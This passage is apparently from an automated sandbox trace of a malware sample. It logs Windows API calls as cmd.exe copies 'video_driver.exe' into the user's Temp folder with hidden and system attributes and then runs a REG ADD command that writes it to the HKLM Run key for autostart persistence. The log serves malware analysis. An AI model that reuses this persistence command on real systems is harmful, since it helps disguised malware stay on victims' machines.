_String2="NUMBER_", _MaxCount=0x7) returned -11 [0038.367] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0038.367] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0038.367] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0038.367] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0038.368] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0038.368] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0038.368] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0038.368] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0038.368] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0038.368] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0038.368] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0038.368] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0038.368] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0038.368] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0038.368] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0038.368] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0038.368] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0038.368] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0038.368] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0038.368] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0038.368] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0038.368] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0038.368] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0038.368] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0038.368] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0038.368] GetProcessHeap () returned 0x330000 [0038.368] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x3312a8 | out: hHeap=0x330000) returned 1 [0038.368] GetProcessHeap () returned 0x330000 [0038.368] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x1d4) returned 0x343320 [0038.373] GetProcessHeap () returned 0x330000 [0038.373] RtlReAllocateHeap (Heap=0x330000, Flags=0x0, Ptr=0x343320, Size=0xf0) returned 0x343320 [0038.373] GetProcessHeap () returned 0x330000 [0038.373] RtlSizeHeap (HeapHandle=0x330000, Flags=0x0, MemoryPointer=0x343320) returned 0xf0 [0038.373] _wcsnicmp (_String1="/y", _String2="/Y", _MaxCount=0x2) returned 0 [0038.373] GetProcessHeap () returned 0x330000 [0038.373] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x2c) returned 0x343418 [0038.373] GetProcessHeap () returned 0x330000 [0038.373] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x258) returned 0x343450 [0038.373] _wcsicmp (_String1="video_driver.exe", _String2=".") returned 72 [0038.373] _wcsicmp (_String1="video_driver.exe", _String2="..") returned 72 [0038.373] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\video_driver.exe")) returned 0x20 [0038.373] GetProcessHeap () returned 0x330000 [0038.373] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x2c) returned 0x3436b0 [0038.373] GetProcessHeap () returned 0x330000 [0038.373] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x258) returned 0x344208 [0038.374] _wcsicmp (_String1="video_driver.exe", _String2=".") returned 72 [0038.374] _wcsicmp (_String1="video_driver.exe", _String2="..") returned 72 [0038.374] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x27, ProcessInformation=0x32f650, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x32f650, ReturnLength=0x0) returned 0x0 [0038.374] NtSetInformationProcess (ProcessHandle=0xffffffff, ProcessInformationClass=0x27, ProcessInformation=0x32f658, ProcessInformationLength=0x4) returned 0x0 [0038.374] VirtualAlloc (lpAddress=0x0, dwSize=0xfe00, flAllocationType=0x1000, flProtect=0x4) returned 0x1d0000 [0038.374] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe", fInfoLevelId=0x1, lpFindFileData=0x343458, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x343458) returned 0x3436e8 [0038.374] GetProcessHeap () returned 0x330000 [0038.374] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x0, Size=0x14) returned 0x3312a8 [0038.374] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\video_driver.exe", nBufferLength=0x104, lpBuffer=0x32e970, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\video_driver.exe", lpFilePart=0x0) returned 0x35 [0038.374] _wcsicmp (_String1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe", _String2="con") returned -53 [0038.374] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\video_driver.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x32eb5c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x78 [0038.377] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0038.378] _get_osfhandle (_FileHandle=3) returned 0x78 [0038.378] GetFileType (hFile=0x78) returned 0x1 [0038.378] SetErrorMode (uMode=0x0) returned 0x0 [0038.378] SetErrorMode (uMode=0x1) returned 0x0 [0038.378] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe", nBufferLength=0x208, lpBuffer=0x32ee10, lpFilePart=0x32eb94 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe", lpFilePart=0x32eb94*="video_driver.exe") returned 0x36 [0038.378] SetErrorMode (uMode=0x0) returned 0x1 [0038.378] _get_osfhandle (_FileHandle=3) returned 0x78 [0038.378] ReadFile (in: hFile=0x78, lpBuffer=0x1d0000, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x32ec00, lpOverlapped=0x0 | out: lpBuffer=0x1d0000*, lpNumberOfBytesRead=0x32ec00*=0x200, lpOverlapped=0x0) returned 1 [0038.379] SetErrorMode (uMode=0x0) returned 0x0 [0038.379] SetErrorMode (uMode=0x1) returned 0x0 [0038.379] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\video_driver.exe", nBufferLength=0x208, lpBuffer=0x32e770, lpFilePart=0x32e768 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\video_driver.exe", lpFilePart=0x32e768*="video_driver.exe") returned 0x35 [0038.379] SetErrorMode (uMode=0x0) returned 0x1 [0038.379] _wcsicmp (_String1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe", _String2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\video_driver.exe") returned -20 [0038.379] GetProcessHeap () returned 0x330000 [0038.379] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x258) returned 0x344468 [0038.379] _wcsicmp (_String1="video_driver.exe", _String2=".") returned 72 [0038.380] _wcsicmp (_String1="video_driver.exe", _String2="..") returned 72 [0038.380] GetFileAttributesW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\video_driver.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\video_driver.exe")) returned 0xffffffff [0038.380] GetLastError () returned 0x2 [0038.380] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\video_driver.exe", nBufferLength=0x104, lpBuffer=0x32e970, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\video_driver.exe", lpFilePart=0x0) returned 0x35 [0038.380] SetErrorMode (uMode=0x0) returned 0x0 [0038.380] SetErrorMode (uMode=0x1) returned 0x0 [0038.380] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\video_driver.exe", nBufferLength=0x208, lpBuffer=0x32e770, lpFilePart=0x32e768 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\video_driver.exe", lpFilePart=0x32e768*="video_driver.exe") returned 0x35 [0038.380] SetErrorMode (uMode=0x0) returned 0x1 [0038.380] _wcsicmp (_String1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe", _String2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\video_driver.exe") returned -20 [0038.380] GetFileAttributesW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\video_driver.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\video_driver.exe")) returned 0xffffffff [0038.381] CopyFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\video_driver.exe"), lpNewFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\video_driver.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\video_driver.exe"), lpProgressRoutine=0x0, lpData=0x0, pbCancel=0x4a2441b4, dwCopyFlags=0x0) returned 1 [0038.421] GetFileAttributesW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\video_driver.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\video_driver.exe")) returned 0x2020 [0038.421] SetFileAttributesW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\video_driver.exe", dwFileAttributes=0x2020) returned 1 [0038.422] _close (_FileHandle=3) returned 0 [0038.422] _get_osfhandle (_FileHandle=-1) returned 0xffffffff [0038.423] GetFileType (hFile=0xffffffff) returned 0x0 [0038.423] _get_osfhandle (_FileHandle=-1) returned 0xffffffff [0038.423] SetFileTime (hFile=0xffffffff, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x32eba4) returned 0 [0038.423] FindNextFileW (in: hFindFile=0x3436e8, lpFindFileData=0x343458 | out: lpFindFileData=0x343458*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe800af80, ftCreationTime.dwHighDateTime=0x1d623ff, ftLastAccessTime.dwLowDateTime=0xe8994600, ftLastAccessTime.dwHighDateTime=0x1d623ff, ftLastWriteTime.dwLowDateTime=0x23e34700, ftLastWriteTime.dwHighDateTime=0x1d623f7, nFileSizeHigh=0x0, nFileSizeLow=0xc20b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="video_driver.exe", cAlternateFileName="")) returned 0 [0038.423] GetLastError () returned 0x12 [0038.423] FindClose (in: hFindFile=0x3436e8 | out: hFindFile=0x3436e8) returned 1 [0038.423] NtSetInformationProcess (ProcessHandle=0xffffffff, ProcessInformationClass=0x27, ProcessInformation=0x32f650, ProcessInformationLength=0x4) returned 0x0 [0038.423] _vsnwprintf (in: _Buffer=0x4a245040, _BufferCount=0x103, _Format="%9d", _ArgList=0x32f62c | out: _Buffer=" 1") returned 9 [0038.424] _get_osfhandle (_FileHandle=1) returned 0x7 [0038.424] GetFileType (hFile=0x7) returned 0x2 [0038.424] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0038.424] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x32f5b8 | out: lpMode=0x32f5b8) returned 1 [0038.424] _get_osfhandle (_FileHandle=1) returned 0x7 [0038.424] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x32f5ec | out: lpConsoleScreenBufferInfo=0x32f5ec) returned 1 [0038.424] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2336, dwLanguageId=0x0, lpBuffer=0x4a254640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) copied.\r\n") returned 0x14 [0038.426] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2336, dwLanguageId=0x0, lpBuffer=0x4a254640, nSize=0x2000, Arguments=0x32f62c | out: lpBuffer=" 1 file(s) copied.\r\n") returned 0x1b [0038.426] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a254640*, nNumberOfCharsToWrite=0x1b, lpNumberOfCharsWritten=0x32f610, lpReserved=0x0 | out: lpBuffer=0x4a254640*, lpNumberOfCharsWritten=0x32f610*=0x1b) returned 1 [0038.426] _get_osfhandle (_FileHandle=1) returned 0x7 [0038.426] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0038.427] _get_osfhandle (_FileHandle=1) returned 0x7 [0038.427] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a2441ac | out: lpMode=0x4a2441ac) returned 1 [0038.427] _get_osfhandle (_FileHandle=0) returned 0x3 [0038.427] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a2441b0 | out: lpMode=0x4a2441b0) returned 1 [0038.427] SetConsoleInputExeNameW () returned 0x1 [0038.427] GetConsoleOutputCP () returned 0x1b5 [0038.427] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a244260 | out: lpCPInfo=0x4a244260) returned 1 [0038.427] SetThreadUILanguage (LangId=0x0) returned 0x409 [0038.428] exit (_Code=0) Process: id = "3" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x4ab90000" os_pid = "0xa98" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c REG ADD \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"video_driver\" /t REG_SZ /d \"%TEMP%\\video_driver.exe\" /f" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 3 os_tid = 0x3a4 [0038.536] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x3cf9d4 | out: lpSystemTimeAsFileTime=0x3cf9d4*(dwLowDateTime=0xfde12640, dwHighDateTime=0x1d623ff)) [0038.536] GetCurrentProcessId () returned 0xa98 [0038.536] GetCurrentThreadId () returned 0x3a4 [0038.536] GetTickCount () returned 0x1144f49 [0038.536] QueryPerformanceCounter (in: lpPerformanceCount=0x3cf9cc | out: lpPerformanceCount=0x3cf9cc*=15866929591) returned 1 [0038.538] GetModuleHandleA (lpModuleName=0x0) returned 0x4a810000 [0038.538] __set_app_type (_Type=0x1) [0038.538] __p__fmode () returned 0x770331f4 [0038.538] __p__commode () returned 0x770331fc [0038.538] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a8321a6) returned 0x0 [0038.539] __getmainargs (in: _Argc=0x4a834238, _Argv=0x4a834240, _Env=0x4a83423c, _DoWildCard=0, _StartInfo=0x4a834140 | out: _Argc=0x4a834238, _Argv=0x4a834240, _Env=0x4a83423c) returned 0 [0038.539] GetCurrentThreadId () returned 0x3a4 [0038.539] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x3a4) returned 0x60 [0038.539] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0038.539] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0038.539] SetThreadUILanguage (LangId=0x0) returned 0x409 [0038.539] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0038.539] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x3cf964 | out: phkResult=0x3cf964*=0x0) returned 0x2 [0038.540] VirtualQuery (in: lpAddress=0x3cf99b, lpBuffer=0x3cf934, dwLength=0x1c | out: lpBuffer=0x3cf934*(BaseAddress=0x3cf000, AllocationBase=0x2d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0038.540] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x3cf934, dwLength=0x1c | out: lpBuffer=0x3cf934*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0038.540] VirtualQuery (in: lpAddress=0x2d1000, lpBuffer=0x3cf934, dwLength=0x1c | out: lpBuffer=0x3cf934*(BaseAddress=0x2d1000, AllocationBase=0x2d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0038.540] VirtualQuery (in: lpAddress=0x2d3000, lpBuffer=0x3cf934, dwLength=0x1c | out: lpBuffer=0x3cf934*(BaseAddress=0x2d3000, AllocationBase=0x2d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0038.540] VirtualQuery (in: lpAddress=0x3d0000, lpBuffer=0x3cf934, dwLength=0x1c | out: lpBuffer=0x3cf934*(BaseAddress=0x3d0000, AllocationBase=0x3d0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0038.540] GetConsoleOutputCP () returned 0x1b5 [0038.540] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a834260 | out: lpCPInfo=0x4a834260) returned 1 [0038.540] SetConsoleCtrlHandler (HandlerRoutine=0x4a82e72a, Add=1) returned 1 [0038.540] _get_osfhandle (_FileHandle=1) returned 0x7 [0038.540] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0038.540] _get_osfhandle (_FileHandle=1) returned 0x7 [0038.540] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8341ac | out: lpMode=0x4a8341ac) returned 1 [0038.541] _get_osfhandle (_FileHandle=1) returned 0x7 [0038.541] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0038.541] _get_osfhandle (_FileHandle=0) returned 0x3 [0038.541] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8341b0 | out: lpMode=0x4a8341b0) returned 1 [0038.541] GetEnvironmentStringsW () returned 0x842190* [0038.541] GetProcessHeap () returned 0x830000 [0038.541] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x8, Size=0xaca) returned 0x842c68 [0038.541] FreeEnvironmentStringsW (penv=0x842190) returned 1 [0038.542] GetProcessHeap () returned 0x830000 [0038.542] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x8, Size=0x4) returned 0x841870 [0038.542] GetEnvironmentStringsW () returned 0x842190* [0038.542] GetProcessHeap () returned 0x830000 [0038.542] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x8, Size=0xaca) returned 0x843740 [0038.542] FreeEnvironmentStringsW (penv=0x842190) returned 1 [0038.542] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3ce8d4 | out: phkResult=0x3ce8d4*=0x68) returned 0x0 [0038.542] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3ce8dc, lpData=0x3ce8e0, lpcbData=0x3ce8d8*=0x1000 | out: lpType=0x3ce8dc*=0x0, lpData=0x3ce8e0*=0x0, lpcbData=0x3ce8d8*=0x1000) returned 0x2 [0038.542] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3ce8dc, lpData=0x3ce8e0, lpcbData=0x3ce8d8*=0x1000 | out: lpType=0x3ce8dc*=0x4, lpData=0x3ce8e0*=0x1, lpcbData=0x3ce8d8*=0x4) returned 0x0 [0038.542] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3ce8dc, lpData=0x3ce8e0, lpcbData=0x3ce8d8*=0x1000 | out: lpType=0x3ce8dc*=0x0, lpData=0x3ce8e0*=0x1, lpcbData=0x3ce8d8*=0x1000) returned 0x2 [0038.542] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3ce8dc, lpData=0x3ce8e0, lpcbData=0x3ce8d8*=0x1000 | out: lpType=0x3ce8dc*=0x4, lpData=0x3ce8e0*=0x0, lpcbData=0x3ce8d8*=0x4) returned 0x0 [0038.542] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3ce8dc, lpData=0x3ce8e0, lpcbData=0x3ce8d8*=0x1000 | out: lpType=0x3ce8dc*=0x4, lpData=0x3ce8e0*=0x40, lpcbData=0x3ce8d8*=0x4) returned 0x0 [0038.542] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3ce8dc, lpData=0x3ce8e0, lpcbData=0x3ce8d8*=0x1000 | out: lpType=0x3ce8dc*=0x4, lpData=0x3ce8e0*=0x40, lpcbData=0x3ce8d8*=0x4) returned 0x0 [0038.542] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3ce8dc, lpData=0x3ce8e0, lpcbData=0x3ce8d8*=0x1000 | out: lpType=0x3ce8dc*=0x0, lpData=0x3ce8e0*=0x40, lpcbData=0x3ce8d8*=0x1000) returned 0x2 [0038.543] RegCloseKey (hKey=0x68) returned 0x0 [0038.543] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3ce8d4 | out: phkResult=0x3ce8d4*=0x68) returned 0x0 [0038.543] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3ce8dc, lpData=0x3ce8e0, lpcbData=0x3ce8d8*=0x1000 | out: lpType=0x3ce8dc*=0x0, lpData=0x3ce8e0*=0x40, lpcbData=0x3ce8d8*=0x1000) returned 0x2 [0038.543] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3ce8dc, lpData=0x3ce8e0, lpcbData=0x3ce8d8*=0x1000 | out: lpType=0x3ce8dc*=0x4, lpData=0x3ce8e0*=0x1, lpcbData=0x3ce8d8*=0x4) returned 0x0 [0038.543] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3ce8dc, lpData=0x3ce8e0, lpcbData=0x3ce8d8*=0x1000 | out: lpType=0x3ce8dc*=0x0, lpData=0x3ce8e0*=0x1, lpcbData=0x3ce8d8*=0x1000) returned 0x2 [0038.543] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3ce8dc, lpData=0x3ce8e0, lpcbData=0x3ce8d8*=0x1000 | out: lpType=0x3ce8dc*=0x4, lpData=0x3ce8e0*=0x0, lpcbData=0x3ce8d8*=0x4) returned 0x0 [0038.543] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3ce8dc, lpData=0x3ce8e0, lpcbData=0x3ce8d8*=0x1000 | out: lpType=0x3ce8dc*=0x4, lpData=0x3ce8e0*=0x9, lpcbData=0x3ce8d8*=0x4) returned 0x0 [0038.543] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3ce8dc, lpData=0x3ce8e0, lpcbData=0x3ce8d8*=0x1000 | out: lpType=0x3ce8dc*=0x4, lpData=0x3ce8e0*=0x9, lpcbData=0x3ce8d8*=0x4) returned 0x0 [0038.543] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3ce8dc, lpData=0x3ce8e0, lpcbData=0x3ce8d8*=0x1000 | out: lpType=0x3ce8dc*=0x0, lpData=0x3ce8e0*=0x9, lpcbData=0x3ce8d8*=0x1000) returned 0x2 [0038.543] RegCloseKey (hKey=0x68) returned 0x0 [0038.543] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b5f [0038.543] srand (_Seed=0x5eb34b5f) [0038.543] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c REG ADD \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"video_driver\" /t REG_SZ /d \"%TEMP%\\video_driver.exe\" /f" [0038.543] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c REG ADD \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"video_driver\" /t REG_SZ /d \"%TEMP%\\video_driver.exe\" /f" [0038.544] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a835260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0038.544] GetProcessHeap () returned 0x830000 [0038.544] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x8, Size=0x210) returned 0x842190 [0038.544] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x842198, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0038.544] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a840640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0038.544] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a840640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0038.544] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a840640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0038.544] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0038.544] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0038.544] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0038.544] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0038.544] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0038.545] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0038.545] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0038.545] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0038.545] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0038.545] GetProcessHeap () returned 0x830000 [0038.545] HeapFree (in: hHeap=0x830000, dwFlags=0x0, lpMem=0x842c68 | out: hHeap=0x830000) returned 1 [0038.545] GetEnvironmentStringsW () returned 0x8423a8* [0038.545] GetProcessHeap () returned 0x830000 [0038.545] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x8, Size=0xae2) returned 0x844d08 [0038.545] FreeEnvironmentStringsW (penv=0x8423a8) returned 1 [0038.545] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a840640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0038.545] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a840640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0038.545] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0038.545] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0038.545] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0038.545] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0038.545] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0038.545] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 